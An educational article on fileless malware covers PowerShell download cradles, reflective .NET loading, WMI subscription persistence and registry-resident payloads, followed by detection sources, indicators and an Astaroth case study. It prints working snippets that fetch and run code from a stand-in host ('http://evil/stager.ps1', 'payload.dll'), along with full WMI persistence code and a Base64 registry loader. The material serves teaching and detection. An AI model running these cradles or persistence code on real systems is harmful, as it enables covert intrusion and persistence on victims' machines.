How fileless malware executes entirely in memory using PowerShell download cradles, .NET reflection, WMI event subscriptions, and registry-resident payloads — with detection strategies and multi-technology attack chain analysis.
Sign in to mark this article as read and track your progress.
Fileless malware executes entirely in volatile memory, leveraging legitimate system tools (LOLBins) and scripting engines rather than dropping traditional executable files. It leaves minimal forensic artefacts on disk, persisting through registry entries, WMI subscriptions, or scheduled tasks that reload the payload into memory after reboot.
Think of fileless malware as a burglar who never brings tools. He uses your own kitchen knife, your own ladder, your own rope. When police search for "burglar tools" they find nothing suspicious. Everything used was already in your house.
The most common fileless technique. Downloads and executes a script entirely in memory — no file touches disk.
IEX (New-Object Net.WebClient).DownloadString("http://evil/stager.ps1")
The downloaded script runs directly in the PowerShell interpreter. Nothing is written to the filesystem. After execution, the script exists only in RAM and disappears on reboot unless a persistence mechanism is installed.
Loads a compiled .NET assembly directly from a byte array in memory:
$bytes = (New-Object Net.WebClient).DownloadData("http://evil/payload.dll")
[Reflection.Assembly]::Load($bytes)
The DLL goes from network packet to memory to execution. It never exists as a file on disk. Traditional AV file scanning cannot detect it.
Creates persistent execution without any traditional autorun entry. Three WMI objects are created:
# Filter: trigger condition
$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter
-Arguments @{Name="PersistFilter";
EventNamespace="root\cimv2";
QueryLanguage="WQL";
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60
WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
AND TargetInstance.SystemUpTime >= 120"}
# Consumer: what to do when triggered
$consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer
-Arguments @{Name="PersistConsumer";
CommandLineTemplate="powershell.exe -enc [payload]"}
# Binding: links filter to consumer
$binding = Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding
-Arguments @{Filter=$filter; Consumer=$consumer}
Survives reboots. No file in Run key, no entry in Startup folder, no scheduled task visible to basic tools.
Detection: Autoruns (Sysinternals) — check the WMI tab. Volatility printkey and cmdline plugins. Sysmon Event ID 19/20/21 (WMI activity).
The encoded payload is stored in a registry value. A tiny loader (in a Run key) reads, decodes, and executes it in memory:
# Loader stored in Run key (tiny, hard to detect):
$payload = (Get-ItemProperty HKCU:\Software\Classes\ms-settings).Icon
IEX([System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($payload)))
The Run key entry looks like a short, innocuous PowerShell command. The actual payload is hidden in an unrelated-looking registry value.
Detection: Procmon filter RegQueryValue → look for PowerShell reading unusual registry keys. Large registry values (>1KB of Base64) in unexpected locations.
Modern attacks chain multiple technologies. No single tool analyses the complete chain.
VBA Macro → PowerShell → .NET DLL → Shellcode
(Word document) (downloads/executes) (.NET reflection) (process injection)
Analysis tool: Event ID 4104 dnSpy x64dbg
olevba (Script Block Log)
Each stage requires a different analysis tool. Missing any stage leaves gaps in understanding the full attack.
| Evidence Source | What It Shows |
|---|---|
| PowerShell Script Block Log (Event 4104) | Decoded script content even when obfuscated |
| Sysmon Event ID 1 | Process creation with full command-line arguments |
| Sysmon Event ID 19/20/21 | WMI filter, consumer, and binding creation |
| Autoruns — WMI tab | Persistent WMI subscriptions |
Volatility malfind | Memory-resident injected code |
Volatility cmdline | Command line of every process at time of capture |
| FakeNet-NG | Network connections made by fileless payload |
powershell.exe spawned by:
winword.exe → macro-to-PowerShell chain
WmiPrvSE.exe → WMI consumer executing payload
svchost.exe → service-based execution
PowerShell command line contains:
-enc → encoded payload
IEX → in-memory execution
DownloadString → download cradle
[Reflection.Assembly]::Load → .NET reflection
Registry contains:
Large Base64 values (>500 chars) in unusual keys
PowerShell commands as registry values
Memory shows:
RWX regions outside mapped modules → injected payload
MZ headers in allocated (not mapped) memory → reflective DLL
Astaroth is a documented fileless malware family that demonstrates the full chain:
.lnk shortcutwscript.exe with a JScript payloadbitsadmin.exe (LOLBin) to download encrypted componentsextrac32.exe (LOLBin) decodes the encrypted downloadregsvr32.exe loads a scriptlet that reflectively loads the Astaroth DLL into memoryNo traditional PE executable ever touches disk as a standalone file. Each stage uses a different trusted system binary.